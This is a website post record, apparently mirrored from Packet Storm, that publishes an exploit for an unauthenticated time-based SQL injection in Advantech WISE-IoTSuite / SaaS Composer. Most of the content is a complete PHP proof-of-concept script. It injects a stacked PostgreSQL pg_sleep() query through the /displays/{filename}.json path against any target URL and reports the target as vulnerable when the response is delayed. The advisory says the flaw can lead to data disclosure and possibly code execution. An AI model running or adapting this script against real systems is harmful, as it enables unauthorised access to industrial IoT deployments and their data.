{"id":38347,"date":"2026-01-30T12:54:19","date_gmt":"2026-01-30T12:54:19","guid":{"rendered":"http:\/\/localhost\/?p=38347"},"modified":"2026-01-30T12:54:19","modified_gmt":"2026-01-30T12:54:19","slug":"advantech-iotsuite-iot-edge-sql-injection","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=38347","title":{"rendered":"\ud83d\udcc4 Advantech IoTSuite \/ IoT Edge SQL Injection_PACKETSTORM:214605"},"content":{"rendered":"

{“lastseen”:”2026-01-30T17:51:18″,”description”:”A critical unauthenticated SQL injection vulnerability was identified in Advantech WISE-IoTSuite \/ SaaS Composer. The issue resides in the \/displays\/filename.json endpoint, where the filename parameter is improperly sanitized before being concatenated…”,”published”:”2026-01-30T00:00:00″,”modified”:”2026-01-30T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Advantech IoTSuite \/ IoT Edge SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:214605″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”=============================================================================================================================================\\n | # Title : Advantech IoTSuite \/ IoT Edge Products SaaS Composer \u2013 Unauthenticated Time-Based SQL Injection |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.1 (64 bits) |\\n | # Vendor : https:\/\/www.advantech.com\/en |\\n =============================================================================================================================================\\n \\n [+] References : \\n \\n [+] Summary : A critical unauthenticated SQL injection vulnerability was identified in Advantech WISE-IoTSuite \/ SaaS Composer.\\n The issue resides in the \/displays\/{filename}.json endpoint, where the filename parameter is improperly sanitized before being concatenated into a backend PostgreSQL query.\\n An attacker can exploit this flaw by injecting stacked SQL queries, such as a time-based payload using pg_sleep(), to confirm successful query execution.\\n This vulnerability may allow database enumeration, sensitive data disclosure, and under certain configurations, could potentially lead to remote code execution depending on database privileges.\\n The vulnerability can be exploited remotely without authentication, posing a significant security risk to affected deployments.\\n \\n [+] POC :\\n \\n \\u003c?php\\n \\n error_reporting(E_ALL);\\n ini_set(\\”display_errors\\”, 1);\\n \\n $SLEEP_TIME = 10;\\n $TIMEOUT = 15;\\n \\n function build_payload_path($org_id, $sleep_time) {\\n return \\”\/displays\/filename.json’; select pg_sleep(\\” . $sleep_time . \\”) –?org_id=\\” . $org_id;\\n }\\n \\n function test_vulnerability($base_url, $org_id, $sleep_time, $timeout) {\\n \\n if (!preg_match(‘#^https?:\/\/#’, $base_url)) {\\n $base_url = \\”https:\/\/\\” . $base_url;\\n }\\n \\n $payload = build_payload_path($org_id, $sleep_time);\\n $target = rtrim($base_url, ‘\/’) . $payload;\\n \\n echo \\”[+] Target URL : {$base_url}\\\\n\\”;\\n echo \\”[+] Injecting : org_id={$org_id}\\\\n\\”;\\n echo \\”[+] Payload : {$payload}\\\\n\\”;\\n echo \\”[+] Full URL : {$target}\\\\n\\”;\\n echo \\”—————————————————-\\\\n\\”;\\n \\n $ch = curl_init();\\n curl_setopt_array($ch, [\\n CURLOPT_URL =\\u003e $target,\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n CURLOPT_SSL_VERIFYHOST =\\u003e false,\\n CURLOPT_TIMEOUT =\\u003e $timeout\\n ]);\\n \\n $start = microtime(true);\\n curl_exec($ch);\\n $error = curl_error($ch);\\n curl_close($ch);\\n \\n if ($error) {\\n echo \\”[!] ERROR: {$error}\\\\n\\”;\\n exit(3);\\n }\\n \\n $duration = microtime(true) – $start;\\n printf(\\”[*] Response time: %.2f seconds\\\\n\\”, $duration);\\n \\n if ($duration \\u003e= $sleep_time) {\\n echo \\”\\\\n=== RESULT: VULNERABLE ===\\\\n\\”;\\n echo \\”[+] Time-based SQL injection confirmed.\\\\n\\”;\\n echo \\”[+] PostgreSQL pg_sleep() executed.\\\\n\\”;\\n echo \\”[+] Further impact depends on DB privileges.\\\\n\\”;\\n exit(0);\\n } else {\\n echo \\”\\\\n=== RESULT: NOT VULNERABLE ===\\\\n\\”;\\n echo \\”[-] No significant delay detected.\\\\n\\”;\\n exit(1);\\n }\\n }\\n \\n $options = getopt(\\”\\”, [\\”url:\\”, \\”org::\\”]);\\n \\n if (!isset($options[\\”url\\”])) {\\n echo \\”Usage: php advantech_sqli_poc.php –url https:\/\/target –org 1\\\\n\\”;\\n exit(1);\\n }\\n \\n $org_id = isset($options[\\”org\\”]) ? (int)$options[\\”org\\”] : 1;\\n \\n echo \\”==========================================================\\\\n\\”;\\n echo \\” Advantech SaaS Composer – SQL Injection PoC by indoushka\\\\n\\”;\\n echo \\”==========================================================\\\\n\\”;\\n echo \\”[*] Using org_id = {$org_id}\\\\n\\\\n\\”;\\n \\n test_vulnerability($options[\\”url\\”], $org_id, $SLEEP_TIME, $TIMEOUT);\\n \\n \\n \\t\\n Greetings to :============================================================\\n jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|\\n ==========================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/214605″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/214605\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-01-30T17:51:18″,”description”:”A critical unauthenticated SQL injection vulnerability was identified in Advantech WISE-IoTSuite \/ SaaS Composer. The issue resides in the \/displays\/filename.json endpoint, where the filename parameter…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-38347","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 Advantech IoTSuite \/ IoT Edge SQL Injection_PACKETSTORM:214605 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=38347\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Advantech IoTSuite \/ IoT Edge SQL Injection_PACKETSTORM:214605 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-01-30T17:51:18″,”description”:”A critical unauthenticated SQL injection vulnerability was identified in Advantech WISE-IoTSuite \/ SaaS Composer. The issue resides in the \/displays\/filename.json endpoint, where the filename parameter...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=38347\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-01-30T12:54:19+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38347#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38347\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Advantech IoTSuite \\\/ IoT Edge SQL Injection_PACKETSTORM:214605\",\"datePublished\":\"2026-01-30T12:54:19+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38347\"},\"wordCount\":653,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=38347#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38347\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38347\",\"name\":\"\ud83d\udcc4 Advantech IoTSuite \\\/ IoT Edge SQL Injection_PACKETSTORM:214605 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-01-30T12:54:19+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38347#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=38347\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38347#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Advantech IoTSuite \\\/ IoT Edge SQL Injection_PACKETSTORM:214605\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Advantech IoTSuite \/ IoT Edge SQL Injection_PACKETSTORM:214605 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=38347","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Advantech IoTSuite \/ IoT Edge SQL Injection_PACKETSTORM:214605 - zero redgem","og_description":"{“lastseen”:”2026-01-30T17:51:18″,”description”:”A critical unauthenticated SQL injection vulnerability was identified in Advantech WISE-IoTSuite \/ SaaS Composer. The issue resides in the \/displays\/filename.json endpoint, where the filename parameter...","og_url":"https:\/\/zero.redgem.net\/?p=38347","og_site_name":"zero redgem","article_published_time":"2026-01-30T12:54:19+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=38347#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=38347"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Advantech IoTSuite \/ IoT Edge SQL Injection_PACKETSTORM:214605","datePublished":"2026-01-30T12:54:19+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=38347"},"wordCount":653,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=38347#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=38347","url":"https:\/\/zero.redgem.net\/?p=38347","name":"\ud83d\udcc4 Advantech IoTSuite \/ IoT Edge SQL Injection_PACKETSTORM:214605 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-01-30T12:54:19+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=38347#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=38347"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=38347#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Advantech IoTSuite \/ IoT Edge SQL Injection_PACKETSTORM:214605"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/38347","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=38347"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/38347\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=38347"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=38347"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=38347"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}